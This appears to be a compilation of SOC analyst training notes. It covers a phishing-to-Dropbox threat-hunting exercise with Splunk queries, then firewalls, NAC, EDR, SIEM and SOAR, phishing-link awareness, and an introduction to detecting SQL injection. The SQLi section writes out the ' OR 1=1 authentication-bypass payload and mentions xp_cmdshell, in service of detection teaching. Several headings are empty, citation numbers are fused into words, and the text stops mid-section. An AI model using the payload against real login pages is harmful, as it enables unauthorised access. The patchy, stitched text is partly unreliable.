The scenario is based on a post-compromise activity involving initial access via phishing, followed by lateral movement and data exfiltration using cloud services.

Phase 1 — Scenario Setup
Background
A user in the Sales department reports unusual slowness and pop-ups.
The security team suspects the machine may have been compromised.
You are provided with logs from:
1.Sysmon (Windows event logging)
2.EDR (CrowdStrike)
3.Proxy logs (Zscaler format)
4.DNS logs
5.Authentication logs (AD)

Your mission is to:

Identify the initial infection vector.
Map the attacker behavior using MITRE ATT&CK.
Correlate indicators across log sources.
Recommend remediation steps.

Phase 2 — Hypothesis and TTP Mapping

Hypothesis: A phishing email led to malware execution on a workstation. The malware established persistence, then moved laterally via RDP and exfiltrated data via Dropbox.

Relevant MITRE Techniques:

T1566.001 — Phishing: Spearphishing Attachment
T1059 — Command and Scripting Interpreter
T1021.001 — Remote Desktop Protocol
T1041 — Exfiltration Over Web Service

Phase 3 — Threat Hunting Process

1. Identify Initial Execution
Sysmon Query (SPL or KQL):

index=sysmon EventCode=1
CommandLine=”powershell*” OR CommandLine=”cmd*”
| where CommandLine like “%-EncodedCommand%”
| stats count by host, CommandLine, ParentProcessName, _time

Finding:
A user opened a document from their desktop. It spawned winword.exe, which then launched PowerShell with an encoded payload.

2. Detect Persistence
Sysmon EventCode=13 (Registry Modification):

index=sysmon EventCode=13
TargetObject="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*"

Finding:
The payload added itself to the Run key for persistence.

3. Lateral Movement via RDP
Windows Security Log — Event ID 4624:

index=wineventlog EventCode=4624 LogonType=10
| stats count by TargetUserName, SourceNetworkAddress, WorkstationName

Finding:
RDP sessions initiated from the infected host to multiple internal servers using cached credentials.

4. Exfiltration Detection (Proxy Logs)
Zscaler Format Sample:

"timestamp","user","url","app_class","action","dstip"
"2024–06–22T12:45:02Z","jdoe","https://dl.dropboxusercontent.com/data.zip","Web-based file sharing","ALLOW","162.125.32.5"

Query:

SELECT * FROM proxy_logs
WHERE url LIKE '%dropbox%' OR app_class='Web-based file sharing'

Finding:
Large volume of outbound HTTPS requests to Dropbox during non-working hours.

5. Enrich With Threat Intelligence

Lookup IOC:

The PowerShell C2 IP was found in ThreatFox and VirusTotal as linked to AsyncRAT campaigns.

Phase 4 — Report Writing
Report Template
Title: Threat Hunting Report — Phishing to Exfiltration via Dropbox
Date: 2025–06–30
Author: [Your Name]
Scope: Workstation COMP-011 / User jdoe
Tools Used: Splunk, MISP, KQL, Sysmon, Proxy Logs, EDR Console

Findings Summary

MITRE ATT&CK Mapping

T1059.001 — PowerShell Execution
T1547.001 — Registry Run Key Persistence
T1021.001 — RDP Movement
T1041 — Exfiltration via Web Service

Recommendations

1. Isolate host COMP-011 and reset credentials
2.Block outbound connections to dropboxusercontent.com
3.Deploy EDR remediation playbooks for all lateral targets
4.Strengthen email gateway to detect macro documents
5.Hunt for similar IOC patterns across the fleet

Deliverables
.pdf Report
.ioc file with all extracted indicators
.csv of all log events matching threat behavior
Sigma rule for detection of this behavior chain

Summary
This simulation demonstrates how structured threat hunting using correlated logs, threat intel, and detection engineering can surface advanced threats that evade traditional alerting. Real-world Blue Teams should maintain playbooks, enrichments, and hunting dashboards to repeat this process quickly in live environments.

Learning Objective:

1.Define firewalls and their evolution

2.Describe how firewalls work

3.Explain the latest firewall status.

The Evolution of Firewalls:

1. Packet filter/stateless firewall
2. stateful firewall
3. Third-generation firewall
4. Next-genaration firewall (NGFW)

How firewall Work:

First-Generation firewall —

Second Generation firewall —

Third Genaration Firewalls —

The latest firewall traffic —

Network Access Control:

Network access control (NAC), also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network.

s endpoints proliferate across an organization — typically driven by bring-your-own-device (BYOD) policies and an expansion in the use of Internet-of-Things (IoT) devices — more control is needed. Even the largest IT organizations do not have the resources to manually configure all the devices in use. The automated features of a NAC solution are a sizable benefit, reducing the time and associated costs with authenticating and authorizing users and determining that their devices are compliant.

Further, cyber criminals are well aware of this increase in endpoint usage and continue to design and launch sophisticated campaigns that exploit any vulnerabilities in corporate networks. With more endpoints, the attack surface increases, which means more opportunities for fraudsters to gain access. NAC solutions can be configured to detect any unusual or suspicious network activity and respond with immediate action, such as isolating the device from the network to prevent the potential spread of the attack.

Although IoT and BYOD have changed NAC solutions, NAC also serves as a perpetual inventory of users, devices, and their level of access. It serves as an active discovery tool to uncover previously unknown devices that may have gained access to all or parts of the network, requiring IT administrators to adjust security policies.

Further, organizations can choose how NAC will authenticate users who attempt to gain access to the network. IT admins can choose multi-factor authentication (MFA), which provides an additional layer of security to username and password combinations.

Restricting network access also means control of the applications and data within the network, which is normally the target of cyber criminals. The stronger the network controls, the more difficult it will be for any cyberattack to infiltrate the network.

What Are The Advantages of Network Access Control?

Network access control comes with a number of benefits for organizations:

1. Control the users entering the corporate network
2. Control access to the applications and resources users aim to access
3. Allow contractors, partners, and guests to enter the network as needed but restrict their access
4. Segment employees into groups based on their job function and build role-based access policies
5. Protect against cyberattacks by putting in place systems and controls that detect unusual or suspicious activity
6. Automate incident response
7. Generate reports and insights on attempted access across the organization

Current NAC Capabilities:

Sandbox:

A sandbox in computer security is an isolated environment used to safely execute and test untrusted programs, code, or files without risking harm to the host system or network. It acts as a containment area where potentially malicious activities can be observed and analyzed without affecting the broader system. This approach is particularly useful for identifying and mitigating threats such as malware, zero-day exploits, and other cyber risks.

Sandboxing is often implemented through virtualization, where a restricted environment mimics the target system’s operating environment, allowing security professionals to analyze the behavior of suspicious files or applications. For example, security researchers use sandboxes to examine malware by running it in a controlled setting, observing its actions, and determining its potential impact on the system. This method is also widely used by developers to test new code before deploying it to production environments.

There are various types of sandboxing, including application sandboxing, web browser sandboxing, and network sandboxing, each designed to isolate specific components of a system for enhanced security. Additionally, sandboxes can be implemented at the operating system level, such as in Android, where each application runs in its own sandboxed environment, or in Windows with features like Windows Sandbox. These mechanisms help prevent unauthorized access to sensitive data and limit the spread of vulnerabilities.

WAF(Web Application Firewall):

A ‘’’web application firewall (WAF)’’’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection,File Inclusion,security misconfiguration.

While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy.

WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Fortiweb:

Secure Email Gateway:

Content Filterring:

Content filtering is the screening of content to restrict or block websites. This could include material that compromises security or breaches internal content consumption policies.

Content filters manage employee access to websites, emails, or mobile communications. Almost all organizations have some form of filtering system. But filtering varies in form and scope, and many options are available.

Secure Wi-Fi

Endpoint Hardening Techniques:

Endpoint Protection Platforms (EPP)
These are suites of security tools installed locally on each device. EPP includes traditional antivirus, anti-malware, data encryption, intrusion prevention, and data loss prevention (DLP). They work to prevent attacks by detecting and blocking known threats on the endpoint. EPP tools often provide centralized management for easier administration across many devices18.

Endpoint Detection and Response (EDR)
EDR complements EPP by continuously monitoring endpoint behavior. It detects suspicious or malicious activities, provides context for investigations, and enables rapid incident response. EDR records endpoint activity in real-time, helping to uncover hidden threats that bypass preventive measures16.

Antivirus and Anti-Malware Software
Core tools that scan for known malicious code signatures and behaviors. They should be kept up-to-date with the latest threat definitions and may include real-time protection to block threats as they arise257.

Patch Management
Regularly updating the operating system and installed software closes vulnerabilities that attackers exploit. Automated patch management tools help maintain endpoint security hygiene by applying patches promptly25.

Least Privilege Access Control
Limiting user permissions to only the minimum necessary reduces the risk that attackers can escalate privileges if they compromise an endpoint. Removing local administrator rights is a vital preventive tactic in this category125.

Application Control
Tools like Windows Defender Application Control (WDAC) and AppLocker restrict which applications and scripts can run on endpoint blocking unauthorized or potentially malicious software execution2.

Attack Surface Reduction and System Hardening
Techniques to reduce the attack vectors include:

Disabling unnecessary services and features

Restricting file types, especially scripting files

Enabling secure boot to ensure only trusted software loads at startup

Applying firewall rules to control inbound/outbound traffic

Using virtualization-based security to isolate core OS functions25

Full Disk Encryption
Encrypting the entire disk, typically using tools like BitLocker, protects data on stolen or lost devices by requiring authentication to access stored information256.

User Authentication Monitoring
Monitoring login attempts and differentiating between legitimate users and suspicious access attempts helps detect compromised accounts or insider threats1.

DNS Filtering
Blocking access to known malicious websites on the endpoint level as a preventive measure to avoid malware downloads or phishing attacks2.

Privileged Access Workstations (PAW) and Privileged Access Management (PAM)
These strategies secure and monitor administrative access tightly, often requiring use of dedicated, highly secured machines for sensitive tasks to minimize risk2.

Behavioral Analysis and Machine Learning
Advanced endpoint protection solutions employ AI to identify unusual patterns and emerging threats beyond signature-based detection, adapting to new attack techniques135.

In practice, a layered defense approach that combines several of these techniques is most effective to cover the broad spectrum of threats endpoints face. For example, combining an EPP solution with continuous EDR monitoring, proper patching, least privilege policies, and system hardening greatly enhances protection.

Modern local endpoint protection involves the integration of these techniques into cohesive platforms (like Microsoft Defender for Endpoint, Trellix Endpoint Security, and FortiEDR) that provide real-time monitoring, centralized policy enforcement, automated investigation, and remediation capabilities146.

This comprehensive collection of endpoint protection techniques addresses prevention, detection, and response — key pillars needed to secure endpoints in today’s complex threat landscape.

1. https://www.bluevoyant.com/knowledge-center/what-is-endpoint-protection-solutions-and-best-practices
2. https://netcompany.com/a-guide-to-endpoint-security/
3. https://www.adminbyrequest.com/en/blogs/top-strategies-for-effective-endpoint-security
4. https://www.sentinelone.com/cybersecurity-101/endpoint-security/endpoint-protection-solutions/
5. https://www.adminbyrequest.com/en/blogs/mastering-endpoint-security-essential-strategies-and-solutions
6. https://www.fortinet.com/uk/resources/cyberglossary/types-of-endpoint-security
7. https://learn.microsoft.com/en-us/intune/configmgr/protect/deploy-use/endpoint-antimalware-policies
8. https://www.paloaltonetworks.com/cyberpedia/what-is-endpoint-protection
9. https://perception-point.io/guides/endpoint-security/how-to-choose-an-endpoint-protection-platform-epp/

Endpoint Monitoring:

SOAR:Security Orchestration,automation and response

SOAR stands for Security Orchestration, Automation, and Response. It is a technology solution designed to help security operations teams manage, automate, and coordinate their cybersecurity processes and incident response in a more efficient and standardized way.

What Does SOAR Do?

• Orchestration: Connects and integrates multiple security tools (such as firewalls, SIEM, EDR, threat intelligence), centralizing their data and allowing them to work together in concert. This gives a unified view and enables more efficient operations.
• Automation: Takes over repetitive, manual security tasks (e.g., gathering alerts, scanning vulnerabilities, running queries, enriching threat data) and automates well-defined workflows. This reduces human errors, frees up analyst time, and speeds response.
• Response: Coordinates, manages, and standardizes how security teams respond to incidents. SOAR includes incident response playbooks — predefined, automated sequences of actions triggered by certain types of security events.

Core Components of SOAR

Security Orchestration-Integrates diverse security and IT tools for centralized data and workflows.

Security Automation-Automates repetitive and time-consuming activities (e.g., triage, enrichment).

Incident Response-Standardizes and automates the response, escalation, and remediation to threats.

Threat Intelligence-Aggregates and correlates real-time threat intelligence with internal data.

Playbooks-Step-by-step automated workflows for common incidents (like phishing or malware).

Case Management-Documents, tracks, and manages incidents from detection to resolution.

How SOAR Works (Typical Workflow)

1. Detection: SOAR ingests alerts and logs from multiple sources.
2. Triage: Automatically analyzes, prioritizes, and validates alerts — reducing false positives.
3. Enrichment: Pulls contextual information from internal and external intelligence sources to add details to incidents.
4. Response: Executes automated or semi-automated playbooks (e.g., quarantining devices, blocking IPs, alerting users).
5. Escalation: If automation cannot fully resolve, escalates incidents to analysts with all gathered evidence.
6. Case Management & Reporting: Documents the incident lifecycle for compliance and learning.

Why Use SOAR?

• Faster Incident Response: Automates alert triage and routine security tasks — cutting response times from hours to minutes.
• Consistency & Standardization: Predefined playbooks ensure every incident is handled according to best practices.
• Better Use of Resources: Frees up skilled analysts for higher-level investigations and strategic work.
• Reduced Risk and Human Error: Automated processes limit variability and mistakes during incident response.
• Centralization: Brings together data, tools, and workflows in one platform for better collaboration and visibility.

Common SOAR Use Cases

• Phishing Detection & Response: Automatically analyzes suspicious emails, extracts indicators, blocks malicious senders, and isolates endpoints.
• Automated Vulnerability Management: Continuously scans, prioritizes, and remediates known vulnerabilities across the environment.
• Threat Hunting: Correlates and analyzes logs/intelligence to spot emerging threats proactively.
• Case Management: Tracks the full lifecycle of incidents for compliance and forensics.
• Threat Intelligence Integration: Aggregates, correlates, and operationalizes threat data from multiple sources.

SIEM: Security Information and Event Management

SIEM stands for Security Information and Event Management. It is a platform or software solution that collects, aggregates, analyzes, and manages security-related data from multiple sources within an organization’s IT infrastructure, offering a comprehensive and unified view of security across the organization.

What Does SIEM Do?

• Log Collection & Aggregation: SIEM collects log and event data from various sources such as operating systems, servers, applications, firewalls, endpoint devices, databases, network equipment, and cloud environments.
• Normalization & Correlation: The system normalizes all this disparate data into a common format, then uses powerful analytics and correlation rules to connect related events and detect suspicious activities or patterns that might indicate an attack.
• Real-Time Monitoring & Alerting: SIEM provides real-time security monitoring, continuously analyzing incoming data for anomalies, threats, or compliance issues. When something suspicious is detected, the system generates alerts, often with prioritization based on severity.
• Incident Investigation & Forensics: Security teams can investigate incidents using SIEM dashboards, which provide tools for searching, filtering, and visualizing data to understand the scope and timeline of an attack.
• Automation & Response (Integration with SOAR): More advanced SIEMs can feed into or integrate with Security Orchestration, Automation, and Response (SOAR) platforms to automate responses or trigger predefined playbooks.
• Regulatory Compliance: SIEM helps with compliance by producing required audit trails and reports for standards like PCI DSS, HIPAA, GDPR, and more.

How SIEM Works: Main Steps

1. Data Collection: Deploy agents or connectors to collect log and event data from across the IT environment.
2. Data Aggregation & Storage: All data is centralized, typically in a dedicated SIEM server or cloud-based storage for scalability and retention.
3. Event Correlation & Analysis: Rules, machine learning, and behavioral analytics are used to identify abnormal or malicious patterns across data sources.
4. Alerting: High-priority alerts are generated for analysts based on defined policies and analytics results.
5. Investigation: Analysts use SIEM’s search and visualization tools to further investigate incidents and determine the root cause.
6. Reporting & Compliance: Regular or ad-hoc reports can be generated for compliance, forensics, or management.

Key Benefits of SIEM

• Centralized Visibility: View all security events from one place, enhancing situational awareness.
• Improved Threat Detection: Discover threats that would not be apparent from isolated events.
• Incident Response: Increase the speed and accuracy of response to incidents by providing rich contextual data.
• Compliance Aid: Automate log management and reporting for regulatory standards.
• Advanced Analytics: Use user and entity behavior analytics (UEBA), threat intelligence, and sometimes AI to detect sophisticated threats.

Modern SIEM Features

• Integration with cloud and on-prem systems
• User and Entity Behavior Analytics (UEBA)
• SOAR (Security Orchestration, Automation, and Response) capabilities
• Customizable dashboards and reports
• Scalable data storage and retention for historical analysis

Example SIEM Products

Some major commercial and open source SIEM solutions include:

• Splunk
• IBM QRadar
• Microsoft Sentinel
• ArcSight
• Elastic SIEM

In summary, SIEM is foundational in modern cybersecurity operations, enabling organizations to detect, investigate, and respond to abnormal activities or attacks before they do significant damage.

SIEM Compliance:

SIEM Compliance refers to the process by which an organization’s Security Information and Event Management (SIEM) system is configured and managed to meet various regulatory and industry standards related to data protection, monitoring, logging, incident response, and reporting. It ensures that the organization’s security monitoring practices comply with legal and sector-specific requirements such as GDPR, HIPAA, PCI DSS, SOX, FISMA, and others.

Key aspects of SIEM Compliance include:

• Monitoring and Logging: Collecting and securely storing logs and security event data from diverse IT components (servers, firewalls, endpoints, applications) in a way that meets regulatory standards for integrity and retention.
• Data Masking and Protection: Configuring SIEM to mask or protect sensitive information (like Social Security Numbers or personal health data) while still allowing for effective monitoring.
• Real-Time Monitoring and Incident Detection: Setting up continuous, real-time analysis to detect security incidents promptly as many regulations require timely threat detection and response.
• Incident Response and Reporting: Automating the process of responding to and reporting security breaches, often within strict timelines (e.g., breach notification within 72 hours under GDPR).
• Audit Trails and Compliance Reporting: Maintaining detailed logs of security events and activities to provide evidence for audits and regulatory compliance, supported by automated reporting tools.
• Alignment with Multiple Regulations: Customizing SIEM configurations to align with the unique requirements of various regulations an organization must comply with, which can vary by industry and geography.
• Integration and Automation: Enhancing SIEM for compliance by integrating with other security tools (like endpoint detection and vulnerability management) and automating compliance workflows to reduce human error and improve efficiency.

The goal of SIEM Compliance is not just to check regulatory boxes but to strengthen overall cybersecurity posture by ensuring continuous monitoring, timely incident management, and comprehensive documentation for audits and legal scrutiny.

In practice, organizations achieve SIEM Compliance by tailoring their SIEM platforms to meet specific regulatory frameworks, automating compliance monitoring and reporting, conducting regular audits, and integrating SIEM with broader security infrastructure to maintain a holistic security and compliance strategy.

SD-WAN:

ZTNA:Zero Trust Network Access(ZTNA)

Cloud Security:

SASE: Secure access service edge

Introduction

Overview of Cyber Threats Related to Suspicious Links

Suspicious links are one of the most common entry points for cyberattacks. Clicking on a malicious link can lead to:
✔ Phishing — Stealing user credentials.

Common Types of Phishing Attacks:

• Email Phishing: The most common type, involving fraudulent emails that appear legitimate.
• Spear Phishing: Targeted attacks that use personalized information about the victim to increase the likelihood of success.
• Whaling: Phishing attacks that target high-profile individuals within an organization.
• Business Email Compromise (BEC): Phishing attacks that target business email accounts to steal money or sensitive information.
• Smishing: Phishing attacks conducted via SMS messages.
• Vishing: Phishing attacks conducted via phone calls.
• Clone Phishing: Attackers mimic legitimate emails and modify them to include malicious links or attachments.

✔ Malware Infection — Downloading viruses, ransomware, or spyware.

Common Types of Malware:

• Viruses: Malware that attaches to other programs and replicates itself, potentially damaging files or systems.
• Worms: Self-replicating malware that spreads rapidly across networks without needing to attach to other files.
• Trojan Horses: Malware disguised as legitimate software, which can install other malicious programs or steal data.
• Spyware: Software that secretly monitors and collects information about a user's activities without their knowledge.
• Ransomware: Malware that encrypts a user's files and demands payment for their release.
• Adware: Software that displays unwanted advertisements, potentially slowing down a device and exposing users to malicious links.

✔ Data Breaches — Extracting personal or financial data.

Common Causes of Data Breaches:

• Insider Threats: Misuse of privileged access by employees or insiders.
• Weak Passwords: Easily guessable or stolen passwords.
• Unpatched Applications: Outdated software with known vulnerabilities.
• Malware: Malicious software that can infect systems and steal data.
• Social Engineering: Tricking individuals into revealing sensitive information.
• Physical Attacks: Physical theft or damage of devices containing data.

✔ Drive-By Downloads — Exploiting browser vulnerabilities.

Real-World Examples of Phishing & Malware Attacks

1. Google Docs Phishing Attack (2017) — Attackers used a fake Google Docs link to steal Gmail credentials.
   2. Twitter Bitcoin Scam (2020) — Hackers compromised high-profile accounts to post scam links.
   3.WannaCry Ransomware (2017) — Spread via malicious links and infected over 200,000 devices.

Identifying Suspicious Links

Common Signs of a Malicious Link

🔹 Shortened URLs (e.g., bit.ly, tinyurl.com) — Can hide the actual destination.
🔹 Misspellings & Homoglyphs — e.g., g00gle.com instead of google.com.
🔹 Unexpected Domains – Fake subdomains like paypal.secure-login.com.
🔹 HTTP vs. HTTPS – Secure sites should use https://.

Tools to Check Link Safety

VirusTotal — www.virustotal.com
URLVoid — www.urlvoid.com
Google Safe Browsing — transparencyreport.google.com/safe-browsing

Hands-On Activity: Analyzing Real & Fake URLs

Task 1: Spot the Fake URL

Below are three URLs — identify which one is malicious:

1. https://secure-paypal.com/verify
2. https://www.paypal.com/secure-login
3. http://paypa1.com/reset-password

Correct Answer: 1 & 3 are malicious.

• secure-paypal.com is not the official PayPal site.
• paypa1.com uses "1" instead of "l", a classic phishing trick.

Task 2: Check a Suspicious Link in VirusTotal

1. Go to VirusTotal.
2. Copy a suspicious link and paste it into the search bar.
3. Analyze the results — red flags indicate a malicious link.

How Cybercriminals Use Suspicious Links

Phishing Techniques

Email Phishing — Fake invoices, password reset emails.
SMS Phishing (Smishing) — Fake OTP requests, banking scams.
Social Media Scams — Fake giveaways, job scams.

Drive-By Downloads & Watering Hole Attacks

Drive-By Downloads — Clicking a link automatically downloads malware.
Watering Hole Attack — Hackers infect trusted websites to target visitors.

Case Study Discussion: Recent Cyber Attacks Involving Links

Attack: 2023 Microsoft Teams Phishing Scam
🔹 Cybercriminals sent fake meeting links via Microsoft Teams chat.
🔹 Victims were redirected to a fake login page to steal credentials.
🔹 Lesson: Always verify links before clicking, even in work emails.

We have prepared the Web Attacks 101 training to provide a better understanding of cyber attacks (of which 75% are web based applications) and how to respond to these attacks.

What are Web Attacks?

Web applications are applications that provide services for users through a browser interface. Today web applications make up a large portion of internet usage. Sites such as Google, Facebook and YouTube (excluding the mobile applications) are actually web applications.

Because web applications are an interface on the internet for many organizations, attackers could exploit these applications and infiltrate into devices, they could capture personal data or cause

service breakdowns inflicting a serious amount of financial damage.

A study by Acunetix determined that 75 % of all cyber attacks performed were at the web application level.

Below you will find some attack methods used to infiltrate web applications. We will address these methods in our “Web Attacks 101” course; we will explain what these methods are, how and why attackers use them and how we can detect such activities.

• SQL Injection
• Cross Site Scripting
• Command Injection
• IDOR
• RFI & LFI
• File Upload (Web Shell)

Why Detecting Web Attacks Important

When you look at the daily life of the Average Joe you will see that he uses many web applications throughout the day. There are those who visit Spotify to listen to music, those who visit YouTube to watch videos or those who use social media.

It is no surprise that attackers choose web applications as a gateway for their attacks because all institutions have web applications which mostly contain critical data and because modern day applications are highly complicated and have numerous attack vectors. A study conducted by Acunetix reimburses this idea.

“””Recent research shows that 75% of cyber attacks are done at the web application level.“”” [1]

If we examine the anatomy of an attack, we see that the best scenario is to prevent the attack in its first phase. For this reason, there are various security precautions that aim to prevent and detect web applications (WAF, IPS, SIEM rules…).

It is crucial that a SOC analyst detects these web application based attacks which are the preference of attackers and takes precautions against them.

Reference

[1] https://www.acunetix.com/websitesecurity/web-application-attack/

OWASP

The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software.[1]

It goes without doubt that OWASP is one of the best resources to gain information about web application security

OWASP Top Ten

OWASP publishes a list of 10 web application vulnerabilities that possess the most critical security risks every couple of years. As of the writing of this article, the latest publication was in 2021.

The OWASP list published in 2021 contains these critical security risks:

1. Broken Access Control
2. Cryptographic Failures
3. Injection
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging and Monitoring Failures
10. Server-Side Request Forgery (SSRF)

You can read the OWASP publication which contains the most critical security risks here.

References

[1] https://owasp.org/

How Web Applications Work

In order to detect an anomaly we should first understand how the technology works. Applications utilize certain protocols to communicate accurately with each other. Web applications communicate via the Hyper-Text Transfer Protocol (HTTP). Let’s look into how the HTTP protocol works.

For a start, it’s important to know that the HTTP protocol is on the 7th layer of the OSI model. This means that protocols such as the Ethernet, IP, TCP, and SSL are used before the HTTP protocol.

HTTP communication takes place between the server and the client. First, the client requests a specific resource from the server. The server receives the HTTP request and sends back an (HTTP Response) to the client after passing it through certain controls and processes. The client’s device receives the response and displays the requested resource in an appropriate format.

Let’s examine HTTP Requests and HTTP Responses in more detail.

HTTP Requests

An HTTP Request is used to retrieve a certain resource from a web server. This resource may be an HTML file, video, or json data etc. The web server’s job is to process the received response and present it to the user.

There is a standard HTTP format, and all requests must comply with this format so web servers can understand the request. If the request is sent in a different format, then the web server will not understand it and it will send an error to the user or the web server may not be able to provide service (which is another attack type).

An HTTP Request consists of a request line, request headers and a request message body. A request line consists of the HTTP method and the resource requested from the web server. The request header contains certain headers that the server will process. The request message body contains data that is intended to be sent to the server.

In the image above you see an example of an HTTP Request. Let’s examine this HTTP Request line by line.

1. The GET method states that the resource “/” is requested from the server. Because there is no name, rather a symbol such as “/” means that the web server’s main page is requested.
2. Nowadays there are web applications that belong to more than one domain found on a single web server, so browsers use“Host” header to describe which domain the requested resource belongs to.
3. When a web application wants to store information on the client’s device it stores it in a “Cookie” header. Cookies are generally used to store session information. Therefore, you do not have to re enter your username and password when you visit a web application that requires login.
4. The “Upgrade-Insecure-Requests” header is used to state that the client wants to communicate with encryption (SSL).
5. There is information regarding the client’s browser and operating system under the “User-Agent” header. Web servers use this information to send specific HTTP Responses to the client. You can find some automated vulnerability scanners by looking under this header.
6. The type of data requested is found under the “Accept” header.
7. The encoding type that the client understands is found under “Accept-Encoding” header. You can usually find compression algorithm names under this header.
8. Under the “Accept-Language” header you can find the clients language information. The web server uses this information to display the prepared content in the client’s language.
9. The “Connection” header shows how the HTTP connection will be made. If there is any data such as “close” found here, it means that the TCP connection will be closed after the HTTP response is received. If you see “Keep-alive” this means that the connection will be continued.
10. An empty line is put between the HTTP Request Header and the HTTP Request Message Body to make a partition.
11. Other data intended to be sent to the web application is found within the Request Message Body. If the HTTP POST method is used, then POST parameters can be found here.

HTTP Responses

Once the web server receives an HTTP Request, it performs the required controls and processes and then sends the requested resource to the client. There is no uniform process here because there are numerous technologies and designs involved. The server may pull data from the database according to what the requested resource is, or it can process according to incoming data. But the HTTP Response Message must reach the client after all the processing.

A HTTP Response Message contains a Status Line, Response Headers, and a Response Body. The Status Line contains the status code (such as 200: OK) and HTTP protocol information. There are headers used for numerous purposes within the Response Header. Data related to the requested resource is found within the Response Body.

If a web page was requested, there will usually be HTML codes in the Response Body. When the client receives the HTML code, the web browser processes the HTML code and displays the web page.

You can see a HTTP Response request in the image above. Let’s examine a HTTP Response request based on this image.

Status Line

There is information about the HTTP version and HTTP response status code in the Status Line. HTTP response status code is used to describe the status of the request. There are many HTTP response status codes, but they can be summarized as so:

● 100–199: Informational responses

● 200–299: Successful responses

● 300–399: Redirection messages

● 400–499: Client error responses

● 500–599: Server error responses

Response Headers

Here are some HTTP Response Headers that you may come across frequently:

● Date: The exact time the server sent the HTTP Response to the client.

● Connection: It states how the connection will be handled, just like in the HTTP Request header.

● Server: Information about the server’s operating system and the web server’s version.

● Last-Modified: Information about when the requested resource was changed. This header is used for the cache mechanism.

● Content-Type: The type of data that is sent.

● Content-Length: The size of the data sent.

Response Body

The HTTP Response Body contains the resource that was sent by the server and requested by the client.

Detecting SQL Injection Attacks

What is SQL Injection (SQLi)?

SQL Injections are critical attack methods where a web application directly includes unsanitized data provided by the user in SQL queries.

The frameworks we use these days to develop web applications have preventative mechanisms in place to protect against SQL Injection attacks. But we still come across SQL Injection vulnerabilities because sometimes raw SQL queries are used, sometimes the framework has an innate SQL Injection vulnerability or the framework is not used properly.

SQL Injection Types

There are 3 types of SQL Injections. These are:

1. In-band SQLi (Classical SQLi): If a SQL query is sent and replied to over the same channel, we call these In-band SQLi. It is easier for attackers to exploit these compared to other SQLi categories.
2. Inferential SQLi (Blind SQLi): SQL queries that receive a reply that cannot be seen are called Inferential SQLi. They are called Blind SQLi because the reply cannot be seen.
3. Out-of-band SQLi: If the reply to a SQL query is communicated over a different channel then this type of SQLi is called Out-of-band SQLi. For example, if the attacker is receiving replies to his SQL queries over the DNS this is called an out-of-band SQLi.

How Does SQL Injection Work?

Today standard web applications most commonly receive data from a user and use this data to display specific content. The login page is where most SQL Injection attacks happen. Let’s examine how SQL injections work through an example.

A user is generally expected to enter his/her username and password on the login page. On the other side, the web application will use this username and password information to create a SQL query like the one below:

SELECT * FROM users WHERE username = ‘USERNAME’ AND password = ‘USER_PASSWORD’

The meaning of this SQL query is “bring me all the information about the user from the users table whose name is USERNAME and whose password is USER_PASSWORD”. If the web application does find a matching user, it will authenticate the user, if it cannot find a user after the query is performed then the login will be unsuccessful.

Let’s say your username is “john”, and your password is “supersecretpassword”. When you enter this information and click on the login button the SQL query you see below will be queried and you will be able to enter because there was a match found after the SQL query.

SELECT * FROM users WHERE username = ‘john’ AND password = ‘supersecretpassword’

So, what if we did not use this system the way it was designed and we put an apostrophe (‘) in the username area? The SQL query will be as below and the error will be excluded from the database because the query was faulty.

SELECT * FROM users WHERE username = ‘john’’ AND password = ‘supersecretpassword’

An attacker would be glad to get an error message. Attacker can both manipulate the information in the error message for his own advantage and it also shows him that he is on the right path. What if the attacker enters a payload like the one below into the username area?

‘ OR 1=1 — -

When the attacker sends the payload the web application will execute the following SQL query:

SELECT * FROM users WHERE username = ‘’ OR 1=1 — — AND password = ‘supersecretpassword’

In SQL, whatever characters come after “ — -” will be perceived as a comment line. So if we look at the query above, the queries that come after “ — -” do not mean anything. So let’s remove this part in order to simplify things before we continue to examine the SQL query.

SELECT * FROM users WHERE username = ‘’ OR 1=1

So now the query above looks like this: “if the username is empty or 1=1”. It is not really important whether the username area is left empty or not because 1 is always equal to 1. That is why this query will always be true and it will most probably call the first entry in the database. The attacker will be able to successfully enter the web application because there is a match.

This example is a typical SQL injection attack. Of course SQL injection attacks are not limited to this example, the attacker could use SQL to execute commands in the system with the help of SQL commands such as xp_cmdshell.

How Attackers Leverage with SQL Injection Attacks

In order to understand why SQL Injection attacks are so critically important, let’s take a look at what a SQL injection attack can cause.

• Authentication bypass
• Command execution
• Exfiltrating sensitive data
• Creating/deleting/updating database entries

How to Prevent SQL Injections

• Use a framework: of course just using a framework will not be sufficient to prevent a SQL Injection attack. It is of utmost importance to use the framework in accordance with documentation.
• Keep your framework up to date: Keep your web application secure by following security updates related to the framework you use.
• Always sanitize data received from a user: Never trust data received from a user. On top of that do not only sanitize the form data but also do the same with other data (such as Headers, URLs, etc.)
• Avoid using raw SQL queries: You may have a habit of writing raw SQL queries but you should opt to make use of the benefits a framework provides and you should also make use of the security it provides.

Detecting SQL Injection Attacks

We have discussed what attackers can do with a SQL Injection attack in the previous section. Each of the results of a SQL Injection stated above could cause great loss for an institution so as SOC Analysts we should be able to detect these attacks and be able to take precautions against them.

So, how can we detect SQL Injection attacks?

There is more than one answer to this question. These are:

• When examining a web request check all areas that come from the user: Because SQL Injection attacks are not limited to the form areas, you should also check the HTTP Request Headers like User-Agent.
• Look for SQL keywords: Look for words like INSERT, SELECT, WHERE within the data received from users.
• Check for special characters: Look for apostrophes (‘), dashes (-), or parentheses which are used in SQL or special characters that are frequently used in SQL attacks within the data received from the user.
• Familiarize yourself with frequently used SQL Injection payloads: Even though SQL payloads change according to the web application, attackers still use some common payloads to check for SQL Injection vulnerabilities. If you are familiar with these payloads, you can easily detect SQL Injection payloads. You can see some frequently used SQL Injection payloads here.

Detecting Automated SQL Injection Tools

